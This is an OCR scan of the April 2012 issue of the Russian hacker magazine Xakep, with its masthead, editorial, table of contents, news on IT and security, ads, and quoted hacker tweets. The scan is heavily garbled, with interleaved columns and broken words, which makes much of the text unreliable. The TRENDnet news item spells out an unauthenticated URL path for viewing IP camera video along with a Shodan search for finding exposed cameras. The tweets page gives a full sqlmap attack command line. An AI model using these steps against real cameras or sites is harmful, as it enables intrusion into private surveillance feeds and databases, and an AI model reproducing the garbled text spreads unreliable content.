xaker2012-04

Page 1

(game}land hl路l懈n medla <1)

iiiiiiiiiiiiiii ~

~ -芯

ro _

o

路 ~ -N

=::::1

www.epidemz.net

~ .....


Альфа Банк

Оформить дебетовую или кредитную « Мужскую карту» можно в отделениях ОАО «Альфа-Банка », а так же заказав по телефонам :

(495) 229-2222

в Москве

\8-800-333-2-333

в регионах России (звонок бесплатный)

или на сайте

www.mancard.ru :0

:;

"'::2

Q)

0.. х

"'"' "'0.. "' с:

I

ОАО « Ал ьфа-Банк >> . Генераль н ая лицензия банка России на осуществление ба н ковских о п ераций от

www.epidemz.net

29.01.1998 N91326"


!!FiнEP ........

lntro

РЕДАКЦИЯ Главный редактор

Никита «nikitozz» Кислицин (nikitozrareal.xakep.ru ]

Ш еф -р е да ктор

Степан «step» Ильин l steoГcl '"ea l. xake g .ru ]

Вып ускаю щий редактор

Николай «gorl» Андреев lgorlum!areal.xakep.ru]

Редакторы рубрик

PC_ZONE и UNITS

Степан «step>> Ильин

lstepffi '"eal.xakep.ru ] (petya0rea l. xake o.ru ]

взлом

Петр Стаховски

UNIXOID и SYN/ACK MALWARE РR-менеджер

Андрей «Andrushock>> Матвеев (andrushockiOrea l.xakep.ru ] Александр «О г. К!ouniz» Лозовский (alexanderrareal.xakep.ru] Николай «gorl» Андреев [ g oг l umfOreal . xakep . г u ] Людмила Вагизова (vaq lzovaraqk.ru ]

Литературный редактор

Анна Аранчук

КОДИНГ

DVD Выn уска ющий редактор

Антон «ant» Жуков [ antrarea l .xakep.гu ]

Uni х- ра з дел Security-paздeл

Андрей «Andrushock>> Матвеев [ ~ n drushock0 гea l .xa kep.rul Дмитрий «D1g1 >>Евдокимов [evdoklmovdsragmall.com ]

Монтаж видео

Максим Т рубицын

ART Алик Вайнер [al i kiCiglc. гul

Арт-директор Дизайнер

Егор Пономарев

Верстальщик

Вера Светлых

Иллюстрация н а обложке

Алексей Ляnунов и Лена Эрлих

PUBLISHING У чр е дитель

000 «ГеймЛэнд)), 115280,

Москва,

у л. Ленинская Слобода, 19, Омега nлаза,

ВООБРАЖЕНИЕ И РАМКИ

5 зтаж, офис No 21.

Ге н ера льный директор

Дмитрий Агарунов

Ге н е р альный издатель

Андрей Михайлюк

Финансовый дир ектор

Андрей Фатеркин

Дир ек тор по маркетингу

Елена Каркашадзе

У пр ав ляющий арт-директор

Алик Вайнер

Гл ав ныйдиз ай н е р

Знди Тернбулл

Дир ек тор по пр оизво дству

Сергей Кучерявый

Т ел. :

[4951 935-7034, факс: [4951 545-0906

РАЗМЕЩЕНИЕ РЕКЛАМЫ Т ел.: [4951935-7034, факс: 14951 545-0906

РЕКЛАМНЫЙ ОТДЕЛ Заместитель генерального

Зинаида Чередниченко [zina

dachfaglc.ru ]

дир ектор а по продажам

Все по-настоящему новое- это выход за общепринятые рам к и представле ни йотом, что возможно, а что нет, что правильно, а что

абсур дно. Сделать что-то новое, не встречая потока критики и со­

Директор груnnы

TECHNOLOGY

Марин а Филатова

Старшие менеджеры

[filatovaraglc.ru ] Ольга Емельянцева [olgaem lfQgk.ru ] Светлана Мельникова [melnikovafaglc.ru )

Мен еджеры

Д м итрий Качурин [ ka c huпniCiglc .г u [ Елена Поликарп ова [ pol i karuovaraqlc.гu ]

мнений- в принципе невозможно, так уж устроены люди. Умение бытьчуточку сумасшедши м и иногда делать вещи, которы е кажут­ ся окружающим сомнитель ными или даже абсурдными -большое счас тьеl Ведь это снимае т с тебя шоры и по зволяет смотреть на

[работа с рекламными агентствами]

Дире ктор корпоративной групnы

Кристина Татаренкова

Старший трафик-менеджер

вещи шир е, чем остальные л юди.

В детстве у каждого человека все это есть: мы воспринимаем

[tatarenkovarag lc.ru l

Юлия Г ос подинова [gospodinovataglc.ru] Мария Дубровская [ dubгovskayaiCiglc.гu [ Марья Буланова [bulanovataglc.ru }

Старшие менеджеры

ОТДЕЛ РЕАЛИЗАЦИИ СПЕЦПРОЕКТОВ

мир с само го начала, живем и чувствуем все по-настоящему, без

Директор

Александр Коренфел ьд [ koгenfeldiCiglc . гu l

искусстве нны х границ. Н о вот с годами мышление большинства

Менеджеры

Светлана Мюллер Наталия Т улинова

людей сил ьно с т е реотипизируется и в определенный м о мен т разум перестает быть способным прои з водить что-то новое и вы­

РАСПРОСТРАНЕНИЕ

хо дить за навязанные снаружи рамки. Дажешнурки завязать п о­

Дир екто р по дистриб у ции

новому ч еловек уже не мож е т, не говоря уже о том, чтобы создать с нуля что-то.

Руководитель отдела nодnи ски

Татьяна Кошелева [ koshel eva!Og l c . гu ] Виктория Клепикова [lepikovafQglc.ru ]

Ру ково дитель

Наталья Лукичева [ luk i chevarag l c .гu ]

с n е цраспростран е ния

Пишу это к тому, что желаю и тебе и самому себе прон ести по жизни эту способ ность к созиданию, не ста ть долбаным и зомби. И не обязательно для этого быть Сальвадором Д ал и- место для творчества, дурачества и выдумывания естьабсолют но в любом деле, чем бы ты ни занимался .

nikitozz, гл.ред.Х

Претензии и доnолнительная ин фа: В случае возникновения вопросов по качеству печати и ОVО-дисков:

cla1m0gk .ru .

Горячая линия по подnиск е

Факс для отnравки купонов и квитанций на новые подписки:

[495]545-09-06 Т елефон отдела подписки для жителей Москвы: [495]663-82-77 Т елефон для жителей регионов и для звонков с мобильных телефонов: 8-800-200-3-999 Дл я писем: 101000, Москва, Главnочтамт, а/я 652, Хакер Зарегистрировано в Министерстве Российской Федерации по делам печати, телерадиовещанию и средства м мас совых коммуникаций ПИЯ

77-11802

от

14.02.2002.

Отпечатано в типографии Scanweb, Финляндия. Т и раж 219 833 зкземпляров.

P.S. Как и обещал, публикую фотографию логотипаХ на фоне станции «Восток>>-зто, на минуточку, практически южный полюс.

За фотку респект Сереге Сильновуl

Мн ение редакции не обязательно совпадает с мнением авторов. Все материалы в номере предоставляются как информация к размышлению. Лица , использующиеданную информацию в противозаконных целях, могут быть привлечены к ответственности. Редакция не несет ответ­ ственности за содержание рекламных объявлен ий в номере.За перепечатку наших материалов без сп роса- преследуем.

По вопросам лицензирования и получения прав на использование редакционных материалов журнала обращайтесь по адресу: c oпtent0_gk_r_!1 .

© 000 «Гейм Лэнд», ХАКЕР

04/159/2012

РФ,

2012

001

www.epidemz.net


Content

1100 МИНИАТЮРНЫХ РОБОТОВ RECON SCOUT Х Т ПРИНЯТЫ СЛ У ЖБ У АРМИИ СШ А: I

008

HEADER 004

016

MEGANEWS Все новое за n оследний месяц

011

О быстром развертывании виртуальных машин

017

hacker tweets Хак-сценавтвиттере

КолонкаСтепанаИльина Proof-of-coпcept

Идея: извлечь парали пользователей

COVERSTORY

Глаз-алмаз Интервью с Александром Галицким

COVERSTORY

018 Опасный двойник Легкий способ подделки кон­

трольной суммы и ЭЦП с помощью коллизий

www.epidemz.net

Windows из nамяти


116

PCZONE 030

Универонлайн

106

Звенья одной цепи

102

Можнолистатьспециалистом в IT, не выходя и з дома? Даl

036

-

UNIXOID

Расшарить приложение!

идущих на сменут ех нологиям дня вчерашнего

Учимся переносить запущенные программы с одного ком пь ютера на другой

040

«Google следит за тобой .

Разбираемся с

Мы- нет >>

взлом Easy- Hack Хакерекие се кр еты простых вещей

050

Битвы зеленых роботов

-

СуапоgепМоd

Анал и зсвеже нькихуязвимостей

056

ASP.NET: темная

12 2

сторона трассировки

Эксплуатируем систему регистрации и монит оринга исключе ний ELMAH

060

Взлом

128

Maii.Ru Агента

Пол уч аем доступ к истории переписки и контактам в популярном мессенджере

064

Будни халявщика Н евыдуман на яис т орияосерьезныхуязвимостяхпровайдера

068

Тибериумный реверсинг

134

ВнедрениеХ-кода и вирт уальная машина: теория и практика

072

X-Tools

139

Пр ограммы для в з лома

MALWARE 074

С антивирусами покончено! Последняя статья об устройстве аверов: монитори н г сетевой активности и песоч ниц ы

080

Выбираем альтернативную Апdгоid-прошивку:

116

Обзор зксплоитов

Неизвестнаяугроза

Новаязратерминальныхсистем Разворач иваем инф рас труктуру

Разворачиваем отказоустой чивый сервис хранения данных на базе

!Т- решени я от Mic r osoft: обзор гла вны х новино к 2012 года

FERRUM Сетевой форсаж Тести ров а н и е топовых р аутеров Просто конфетка!

Обзор порт ативной акустической системы Ed i fieг М Р1 5

FAQ UNITED

143

Диско

144

WWW2

Большой FAQ

8.5 Гб всякой всячины

метод инжекта

Тгuе-криптование

Д обавляем поддержку своих алгор итм ов в Tru eCrypt Задачинасобеседованиях Интересныезадания,которыедаютнасобеседования х

096

Паттерн << Шаблонный метод>>

100

WМI:обходзащит

Plus

юн и ты

кода и ав тозагрузки

092

Samba

Свежеедыхание

И спользо вание Shim Епgiпе для внедрения

088

VDI на Wiп2k8R2 и Liпux

Неизменно высокая доступность

Удобные wеЬ-сервисы

КОДИНГ Shim: новый

vs MIUI

SYN/ACK

140

Испытываем эв ри стикуа в еров на самых новых вирусах

084

kobjects, sysfs, udev, udisks и upo weг

11 1

1О причин обратить внимание на поисковик Duc kDuckGo.com

044

Новыевременатребуют перемен Описан и е технологий ближайшего будущего,

Инкапсуляц ияалг оритмов Неожиданный взгляд на привычные вещи

www.epidemz.net


MEGANEWS

НА PASTEBIN ПОЯВИЛСЯ АНОНС ГРЯДУЩЕЙ ОПЕРАЦИИ нГЛОБАЛЬНЫЙ БЛЭКАУТ». На31мартаякобызапланирована распределительная атака на

13 корневых

DNS-cepвepoв .

УБИЙЦАТЕЛЕВИДЕНИЯ

ПРИСТАВКИ НА СЛУЖБЕ

СОЗДАТЕЛЬ ПРОТОКОЛА BIТТORRENT ПРИДУМАЛ КОЕ-ЧТО НОВОЕ

полиции

к

ог~а Брэм Коэн создавал протокол ВitТоггепt, желая сделать «что-то

ПРАВООХРАНИТЕЛИ ТОЖЕ СТАРАЮТСЯ ИДТИ В НОГУ

деиствител ьно полезное людям>>, он совсем не ожидал такого от­

С ПРОГРЕССОМ

клика и такого успеха. П ристальное и не всегда приятное внимание

к его персоне, неожиданные пожертвования, посыпавшиеся от благодарных Коэна от ВitТоггепt. Но, к счастью, он все же продолжи л заниматься его под­

держкой и разработкой.

гочисленным операциям

хакеров,причисляю­

щих себя к Aпoпymous,

Недавно Брэм анонсировал н овую версию протокола, получившую имя

ВitТоггепt

лагадаря мно­

Б

пользователей, и сумасшедшая популярность его детища едва не отвратили

Live. На разработку Коэн потратил три года, и предназначается

у специалистов и про­

новшество для организации видеотрансляций через пирингавые сети. Теперь

стыхпользователей

даже при многомиллионной аудитории задержка передачи видео не должна

появилось н емало

превы шать и пяти секунд. ВitТоггепt

«информации к раз­

Live позволяет снизить нагрузку на рас­

пространителя файла до

99 %. По словам Коэна, передача видео таким обра з ом будетстоить дешевле, чем по спутнику или с помощью CDN, и для нее не по­

мышлению>>. Нап ример, в концепрошлогогода

требуется дорогостоящая инфраструктура. Бета-версия доступна по адресу

в Сеть слил и огромный

.," о

live. bittorrent.com, и автор уже заявляет, что BitTorreпt Liv e убьеттелевидение

"

в его текущем виде- должна кануть в лету физическая и нфраструктура ТВ.

Теперь Коэн находится в активном поиске партнеров, которые дадут согласие

apxивl pasteЬin . com/

Nw N8ehFWI спись­ мами представителей

на распространение своего контента по предложенной им модели. Известн о,

правоохранительных

что разработкой уже заинтересовались в

ор ганов , в том числе-

Netflix и Hu lu.

данные с Gmаil-аккаунта Министерства юстиции киберпреступлений Калиф орн ии.

а СамБрзмне с лишком одобряетвесь се годняшний пират­ ский бум и ни когда ничего не скачивал

нелегально . Он хо рошо понима ет,­

МРАА ,

RIAA и nрочи е

организации б у д ут

Эксперты

Ars Techпica основательно покапал ись в этом

архиве и пришли к интересн ым выводам. Оказывается, ХЬох, РSЗ и

iPad сегодня стали одн ими из основных

средствпоискадоказательстввсудебныхрассле довани­ ях. Временные отметки в сохраненных играх, контрольные

точки lчекпоинтыl и даже скриншоты (например, такие, как делает ХЬох Kiпectl,- все это является доказатель-

только рады , есл и

ством и может помочь в решении вопроса о виновности

он это сделает. н Ни

подозреваемого.

в коем с л учае не хочу давать им пов од, они навернякатолько этого и ждутн,­

говорит Коэн , и , вероятнее всего , он

nрав .

Такжеучастилось использование полицией онлай­

новых сред (таких как ХЬох Livel для общения с подо­ зреваемы ми и ведения записи переговора в. отмечает, что компания

Ars Techпica Microsoft вообще заре ги ст риро­

вала «законный перехват>>, то есть систему, позволяющую вести прослушку интернет-переговор ов , в том числе

в ХЬох

Live

или

Skype.

111 Windows8 ВЛАСТИ ИРАНА НАЧАЛИ

BWINDOWSS НЕ БУДЕТ КНОП-

В КАЗАХСТАНЕ ПРЕКРАТИ-

BANDROIDMARKET

ГЛУБОКУЮФИЛЬТРАЦИЮ

КИ нПУСК>>, хотя связанная

ЛИ РАБОТУ ПРАКТИЧЕСКИ

ПОЯВИЛСЯ АНТИВИРУС.

ИЗГPYППЫSWAGGSECURIТY.

трафика на магистральных

с нейфункциональность все

ВСЕ КРУПНЫЕТОРРЕНТ-

СервисВоuпсегбудет

Данные о серверах, информа-

FOXCONN ВЗЛОМАЛИ ХАКЕРЫ

каналах связи, убивая все

же сохранится в системе .

ТРЕКЕРЫ, что связано

автоматическисканировать

цию о партнерах компании,

SSL-соединения . Протокол

Также ОСобзавелась новым

с вступившими в силу в конце

всеприложениянапредмет

логины и пароли, и даже

НТТРSнеработаетнина

л ого.

января изменениями в за-

содержания вирусов и иных

платежные документы

конодательствестраны .

вредоносных программ .

выложили на ТРВ .

одном сайте .

Apple

ХАКЕР 04/159/ 2012

004

www.epidemz.net


01 ЕЖЕНЕДЕ/\ЬНИК В Э/\ЕКТРОННОМ ФОРМАТЕ ВЫХОДИТ В СУББОТУ УТРОМ

02

03

04

ГЕРОИ И 3/\ОДЕИ

АНГ/\ИЙСКОЙ

READER@GLC.RU ИЩЕМ ABTQPOB.

КАЖДУЮ НЕДЕ/\Ю НАШ КО/\УМНИСТ

ПРЕМЬЕР -1\ИГИ ПО ПОНЕДЕ/\ЬНИКАМ

ПРИСЫ/\АИТЕ ИНФОРМАЦИЮ О СЕБЕ

КУ/\ЬТУРЕ

www.epidemz.net

О ФУТБО/\ЬНОЙ


MEGANEWS

СОЦИАЛЬНАЯ СЕТЬ <<ВКОНТАКТЕ~~ окончательно перебралась на международный домен vk .com .

УЯЗВИМОСТЬ В УСТРОЙСТВАХ

ДОБРО ПОЖАЛОВАТЬ

TRENDNET

В ДОПОЛНЕННУЮ РЕАЛЬНОСТЬ!

ЧТОБЫ ПОСМОТРЕТЬ ВИДЕО, ДОСТАТОЧНО ЗНАТЬ ТОЛЬКО IР-АДРЕС КАМЕРЫ

GOOGLE СОБИРАЕТСЯ ВЫПУСТИТЬ УСТРОЙСТВО AUGMENTED REALIТY

1!1

Сетидавным-давно циркулируютслухи ото м, что у корпорации

Google есть секретные подразделе­

ния, где ведется разработка безумных гаджетов,

чуть ли не сборка Терминаторов. А недавно появились со­ общения, что сейчас в жилых домах сотрудников компании проводитсятестированиенекоего«прототипаразвлека­

тельного устройства», работающего в составе домашней сети и способного подключаться к бытовой электронике посредством Wi-Fi и

Bluetooth. Возможно,

речь отелевизи­

онной приставке oтGoogle, а возможно-о панели управ­ ления умным домом. Доподлинно ничего не известно, ведь

Trendnet уже nри­ з нала , что с 2010 года данная уязвимость

действительно прис у тствует в

26

моделя х ее ви­

деокамер , и недавно

опубликовала нов ую версию прошивки, которая закрывает

информация просочилась в сеть случайно-из заявки на разрешение означенного тестирования, которую

Google по­

дала в американскую Федеральную комиссию по коммуни­ кациям. Большая часть таких сообщений, увы, так и остается слухами, не получая ни подтверждений, ни опровержений.

Но информация, nоявившаяся в Сети в этом месяце, носит иной характер. Сначала вспомним ото м, что еще в декабре прошлого года начались первые разговоры ото м, что в

Google работают над какими-то очками, которые в народе Google Glasses. Информация происходила из солидного источника - издания NewYoгk Times, которое

дырк у.

тут же окрестили

к

омпания Tгendпet широко известна благодаря своим системам домашнего видеонаблюдения. Но

не замечено в распространении «желтухи». Подробностей

и у любого крупного вендара случаются оплош­

было мало: некое «носимое>> устройство, вероятно, конку­

ности. Недавно в версии прошивки 1.1.0 lbuild 104) была

рент будущего

обнаружена уязвимость, позволяющая подключаться

и домь1слов, например ото м, что Google обратила внимание

iPod nano.

Появилось множество догадок

к системеТгепdnеt через интернет и смотреть видео

на так называемый

с любой IР-камеры: достаточно просто ввести ее IР-адрес

из компьютерных игр и обозначает часть графического ин­

и добавить к нему nуть из

терфейса пользователя, служащую для отображения важ­

15 символов, одинаковый для

всех моделей. Никакого па рол я не нужно. Для доступа

Heads-Up Display IHUDI. Термин пришел

ной информации во время игрового процесса. Разумеется,

к видеопотоку !даже если он запаролен), достаточно про­

это наводило на мысли о дополненной реальности. Между

стодобавить в конце пyть/anony/mjpg.cgi, и весь контент

тем, сайт 9to5google.com узнал больше деталей и писал, что

прекрасно отображается. Например, введя такой адрес:

http:l/192.168.1.3/anony/mjpg.cgi, ты получишь беспа­

поданным их источника разработка уже на стадии позднего прототипа. И вот прошло больше двух месяцев, пессимисты

1

ральны й доступ к домашней системе видеонаблюдения,

которая установлена на 1 Р-адр есе

192.168.1.3.

уже наверняка мысленно похоронили проект, но данные

о загадочном девай се поя вились снова, на сей раз более

1

Совсем не удивительно, что эта новость уже разлете­

подробные. Итак, источник 9to5goog le.com сообщает:

лась по сети, на Pastebiп выложили список более чем на

1 000 IР-адресов, 1

немнагим меньше собрали на

<<Прототип уже на поздней стадии разработки и выглядит

Reddit.

ТRЕПDПЕТ

Р-адреса систем видеонаблюдения также легко ищутся

через

shodanhq.com,

iV~P11 0WN

который для этого и предназначен.

в точности как обыкновенные очки в тяжелой оправе. В них встроен дисплей с НUО-интерфейсом. На дужках есть не­ сколько кнопок, и если бы не они, очки невозможно было бы

Достаточно ввести поисковый запрос [netcam).

отличить от обь1чн ь1х. Н асколько нам известно, это не перифе­

рий но е устройство для других And гоid-девайсов, как сообщал ТОП ПЛОХИХХОСТИНГОВ СОСТАВИЛА КОМПАНИЯ

GROUP-IB

NYT, - очки напрямую связываются с облаком. Однако они Bluetooth 4.0. Область приме­

могутиспользовать Wi-Fi или

нения-дополненная реальность, которая будет привязана

к сервисам геолокации

Google. Пользователь можетгулять,

а на дисплее очков, в духе Терминатора, будет всплывать информация об увиденных предметах. Очевидно, очки имеют

ПО РЕЗУЛЬТАТАМ

ИССЛЕДОVВАНИЙ САМЫЙ

ОПАСНЫИНАКОНЕЦ2011 ГОДА ХОСТЭАРЕГИСТРИРОВАН В ЛИТВЕ-ЭТО HOSTING MEDIA.

встроенный

GPS и, по-видимому, работают на Andгoid».

Известно, что дисплей есть толькодля одного глаза, он непрозрачный и без 30. Навигация по интерфейсу осущест­ вляется с nомощьюдвижений головы, она проста, и к ней,

пишeт 9 to5google.com , оченьлегко привыкнуть. Движения головы будут практически незаметны для окружающих. Тех­ нические характеристики очков, вероятно, будутсапоста ви ­ мьl сАndгоid-смартфоном. Ну и самое интересное: сообщает­

ся, что

Google может выпуститьустройстводовольно скоро.

ХАКЕР

006

www.epidemz.net

04 /159/2012


www.epidemz.net


MEGANEWS

АПДЕЙТУСТРАНИЛ 20УЯЗВИМОСТЕЙ ( включая одну критическую) в стабильной версии Google Chrome 17.0.963 .46 .

SYMANTEC УТВЕРЖДАЕТ,

ЧТО

В КИТАЕ МОБИЛЬНАЯ ЭПИДЕМИЯ БОТНЕТ ИЗАNDRОID-УСТРОЙСТВ ЗАМЕЧЕН В ПОДНЕБЕСНОЙ

РОБОТЫ НА ВООРУЖЕНИИ АРМИИ США КРУПНУЮ СДЕЛКУ

пециалисты компании Symantec обнаружили

D

малварь под названием

RootSm art,

которая

а

в

110-140тыс.

догово ренностя м, до

енное ведомство С Ш А заключило контакт с ком­

панией Rесоп

Robot ics, для

которой это круп­

нейшая с делк а за всю историю сущес т во вания . Согла сно

активных у стройств

распространяе т ся в альтернативных китайских

мерикан ские вое нны е тоже любят гаджеты. В о­

в день-таков итог

31

мая тек ущего г ода армии С Ш А

будет поставлена партия из

роб отов

анализа трафика на

Rесоп

Andгoid M a г ket подобного, к счастью, обнаружено не

С&С - серве ра х . Спе ­

миллио н ов долларов . Помимо роботов, военные заказали

ц иа л исты считают ,

Scout ХТ.

1100 миниатюрных

каталогах программнаго обеспече ни я. В официально м

Заказ оценивается ни много н и мало в

было. Roo tSma гt ус танавлива ется вм есте с обыч н ым ПО

ч т о ботнет ф ункцио­

дополните л ьных аксессуа ров для R есоп

из каталога, н о при э том п е ред ает на уд але нны й сервер

нир ует приблизи­

миллион доллар ов.

ном е р

те ль на с се н тяб р я

IMEI , номер IMSI,ID соты,lосаtiопагеа code и

код

2011

мобильн ой се ти.

го д а.

Scout Х Т еще

на

<< Несмотря на малый размер, эти машины сыграют

ог ромную роль в обеспечен ии наших бойцов актуальной информацией о происходящем на п оле боя>>, - заявил

RootSm a гt- в сего вторая прогр амма nосл е из­

вестного Giпgeг Masteг, которая на практике применила

представитель R есоп

известный экс плойт Gingeгbг eak. Н о, в отличие от пр е д­

сколько месяцев назад военные уже закупили

шественника, R ootSmaгt н е п оставляется в комnлекте

роботов , в Пентагоне с этим абсолютно согласны.

Robotics.

Судя п отом у, что не­

315 таких

Чтопр едст авляют соб ойэтичудо-железяки?Rесоп

с гооt-эксnлойтом , а п одгружает G ingeгbгeak с удален­ но г о сервера уже nосле ус тан о вки. Rо оt -э ксnлойт идет

Scout ХТ - это автономная

в архиве

че т кости в тит ановом корnусе, способная пере дават ь

shells.zip

13.9

в комплекте с двумя вспомогательным и

видеокамера высокой

качественную карт ин к у наналадонн ик оператора. Проч­

скриnтами для у становки в систе мную область. П осле рутования телефона програм ма по дгр ужаете удаленного

ная конструкция ро бота п озволяет в букваль н ом смысле

сервера еще и Dг oid

забрасывать его на ра сстоя ние до

Live,

которая уже исп олняет роль

сре д ства у дал е нн о гоадмини ст рир ования и выполня ет

всего поражае т способность

36 метров. Но боль ш е Recon Scout ХТ преодол е ­

команды с сер вера. Таким образом телефон ста н овится

вать вертикальные препятствия. Эта кроха может бо дро

частью ботнета, и на порута н ном т е леф о н е хозяин бот­

nеремещаться и маневрировать на вертикальной с т е не

нета, по сут и , может инициир ова ть любы е д ейс тви я. П о о ц енкамспециа листов , ботнетп ри н оситсвоимхозяевам

[youtu .be/5fzi7fxknlc ]l И с пользуя инфракрасный се н со р и бесшумный при в од, Rесоп Scout ХТ может впл от ную по­

от

добр аться к <<логову врага » , не возбуждая подозрений.

1 600 д о 9 000 доллар о в

в су тки.

WEXLER.BOOK Т7007 ЭЛЕКТРОННАЯ КНИГА ПОД УПРАВЛЕНИЕМ ОС п ро д ажу п осту пила электронная

Объем встроенной памяти составляет В ГБ , н о

книга

при желаниии его можн о расш ири ть до

WEXLER.BOOK Т7 007, рабо­ тающая на базе Andгo i d 2.3. Техни­ ческие характеристики новинки т аков ы: 7" сенсо рны й LЕD-экран с ф у нкци ей Multi-Touch, дв ух ъядерный процессорАRМ9, с частотой 1,2 Г Гц и встроенный а д аnтер Wi - Fi [1 ЕЕЕ 802.11 Ь/g/n ] со скоростью доступа до 150 М Бит/с.

[]

ANDROID 2.3

помощью карт

32 ГБ с MicroSD . WEXLER.BOOK Т7007

т акже оснащается датчик ом простра н ствен ­

наго пол оже ния G- сенсор, и функцией под­

клю ч ения внешних U SВ-устройств [USB OTG]. Ридер выполнен в эргономичном металличе ­ ском корпусе и пос т авл я ется в кожаном чехле.

Длит е льн ое время раб оты устройству обе­

Ориентировочная розничная ц е на н ови нки

спечивает аккумулятор емкостью

-4999

3700

мАч.

руб.

ХАКЕР 04/159/2012

008

www.epidemz.net


Можно все! Нельзя стоять на месте Ищем менеджеров по рекламе

job.glc.ru

(game}land Работа в стиле

www.epidemz.net

funk


MEGANEWS

ПОДВЕДЕНЫ ИТОГИ ПЕРВОГО ГОДА РАБОТЫ ПРОГРАММЫ

BUG BOUNТY: Google выплатила за ба г и более 410 ты с . долларов .

ВИРТУАЛЬНЫЕ РЕАЛИИ И ДРУГИЕ ИНТЕРЕСНЫЕ ВЕЩИ О ЛЕКЦИИ ДЖЕРЕМИ БЕЙЛЕНСОНА И КРУТОМ ОБРАЗОВАТЕЛЬНОМ ПРОЕКТЕ

1!1

середине февраля жители М осквы [и нетолькоони, но об этом поговорим ниже] могли прис у тствовать Но лекции Джереми Бейленеона - основателя

лаборатории Viгtual

Human lnteгaction Lab в Стэндфорд­

ско м университете [ vh il .staпfoгd . edu ]. Будучи профессором факультета коммуникаций, Бейленсон нетолькатрудится в одной иэ самых крутых лабораторий виртуальной реаль­ ности в мире, но и специализируется на когнитивной психо­

логии . Проще говоря, ему интересно, каким образом люди могутосознавать себя, когдафизически е условности пер е­ стают иметь значение. Лекция под названием << Бесконечная реальность»прошлаврамкахдистанционногообразова­

тельного проекта Knowledge Stгeam [ know l edgestгeam . гu ]. Как ты nонимаешь, ключевым словом здесь является <<дис­ танционныЙ >>. В се мероприятия можно совершенно бес­

nлатно по сетитьлично, приехав в <<Цифровой окт ябрь>>, но можнотакже посмотреть в прямом эфире или в архиве, ведь

..

ихтранслируютвинтернетдлядесятковтысячзрителей.

Синхронный перевод и НО -качество прилагаются. Джер еми Бейленсон начал свое выстуnление немного необычно да~им

-вместо телемоста аудитории предложили посмотреть

YIII>IБKИ

вступительноевидео. П осредством20-минутнойзаписи Бейленсон объяснил, что не станетсегодня фокусироваться

~ Roitetecom

на технологиях и методологии, так как всю информацию о них можно найти в Сети, но расскажет о результатах ряда экспериментов. Р ечь шла о цифровых а ватарах в самом

широком смысле этого оnределения: практически о любой цифровой репрезентации человеческой личности, будтода голос, передан ны й по

Skype, персенаж онлайновой игры или

воссозданная п ри по м ощи с п ециального П О точн а я вирту­ альнаякопияреальногочеловека.НапримерахБейленс он рассказывал, как человек воспринимаетсебя, в тех или и н ых виртуальных условиях, в <<телах>> различных аватаров.

К примеру, пациентожогового отделения во время пере­

оставлять в сети так называе мые <<цифровые отпечатки>> [то

вязки, разумеется, испытывает боль. Но исследования пока­

есть прак тически любые с леды] и, кон ечно, не обошлось без

зали, что если на голову пациенту одеть шлем виртуальной

обсуждения потенциального вреда, который может нанести

реальности, которыйпе р енесет его в холодный мир, где

человеку излишн ее погружение в вирт уальность .

Стоит заметить, чтодругие лекции проекта

много снега, льда, потрясающей красоты кристаллов и так

далее, ощущения бо л и снижаются едва ли не на

90%.

По окончании видео Д жереми уже лично присоединился

Дистанционный обра зовате ль­ ный прое к т Kпowledge был з апущен осенью

Stream 2011 год а

Ц е нтром новых технологий и технологического nредпри­

Knowledge

нимат е льства

Digital Dctober. Ге­

неральным партнером Kпowledge

Stгeam свободнодо ступны на сайте про ек та и тоже стоят

Stream выст у nает к омпания

озна комления. К примеру, недавнолекцию читал Джан

« Ростелеком н , интеллектуаль ­

к беседе, немногодополнив изложенное в ролике. На­

Перри Барл оу - основатель и вице-председатель E lectгo nic

ступила очередьтрадиционных вопросов из зала и беседы

Fгontieг Founda tion, эксперт по компьютерной безопасности,

с экспертами. Аудитория интересовалась, не аватарли,

а так же поэт и эссеист. Д искусс ия о копирастах, авторских

часом, сам Б ейленсон, ч т о ждет нас в будущем, опасно ли

nравах и свободе информации вышла крайне интересной.

ным партнером- се Российская венч у рная компания н.

УЛЬТРАНОВОСТЬ ОТ ~~ЯВЫ ЗОЛОТОЙ»! <<Я в а Золотая » представляет новую версию сигаре т

решений от << Я вы Золотой>> и выбери вкус, оnтимально

с филыром-мундштуком- << Ява Золотая Ультра

nодходящийименнотебе! « ЯваЗолотаяУлыраТур­

Турбо >> .

бо >> - это современный дизайн, традиционно высокое

Теперь сигареты << Я в а Золотая >> с филыром­

качество табака и nопулярный во всем мире фильтр!

мундштуком представлены в двух версиях- Турбо

Новые сигареты обладают всеми качествами nервой

и Ультра Тур б о . Безуnречное сочетание отборных

версии- смелого решения

сортов табака и мировых технологий nозволили

Турбо >>, при этом содержание смолы и никотина в

нам nо-новому раскрыть уже знакомый турбовкус!

дыме сигареты существенно ниже : смолы-

Почувствуй nреимущества смелых технологичных

никотина-

0,4 м г,

СО-

2011

года << Я вы Золотой

4 м г,

5 м г.

МИНЗДРАВСОЦРАЗВИТИЯ РОССИИ ПРЕДУПРЕЖДАЕТ: КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ www.epidemz.net


1!!1 liiil

ГclnOObznet:

ГciFirefoxNightly:

./sqlma p.py -u http://uгl/ --cгa wl=5 --level=5 --гisk =3 --thгeads=10 <-

для всех dll-модулей в пла­

может дать некоторые практи­

Ты может быть и нуб, но ты ну б

гинах [для Виндыl так как

ческие результаты, но не из-за

Комментарий:

Шутки шутками, но sqlmap- дей­

ствительно крутая тулза для эксплуатаций

<<Физика - как секс: конечно,

АSLRтеп ерь обязателен

нe-ASLR модули могут разрушить всю

э того мы ей занимаемся.>>

безопасность http://t.co/JQFdZгZ4

Ф ей нман

El

Комментарий: Хороший ход для F iгefox, но ...

SQLi-дыpoк.

lcl Доктор Ричард

<3

1!!1 Комментарий: liiil Рича рд Филлипе Фейнман [англ. Richaг d

Phi ll ips Fеуп mап ; 11 мая 1918 - 15 19881 - выдающийся амери­

февра л я

канск ий ученый. Основные достижения

Гclpa_kt :

Эксплуатаци я

Я предлагаю заменить выра­ жение << как отнять конфетку

у ребенка» на <<как обойти

антив ирус>> ... По сути- одно и то же

:1

1!!1 Комментарий : liiil Обхождение антивируса, чаще всего, не сама я сложная задача при пентесте, тут

Крис прав ..

CVE-2011-2371

[Fiгef ox гeduc e Rightl без исполь­

Один из создателей квантовой электроди­

зования нe - ASLR модулей :

намики. В

годах входил в число

Ал амосе .

1!!1 Комментарий: liiil ... но этого не достаточно! Увлекательное чтиво про эк сп луата цию дыры в F i гefox с обходом

ASLR

DEP

и

AS LR . ROP

обход ится не через

в нe-ASLR модулях, а через утечку базо вого адреса

dll

и уже последующего построе ния

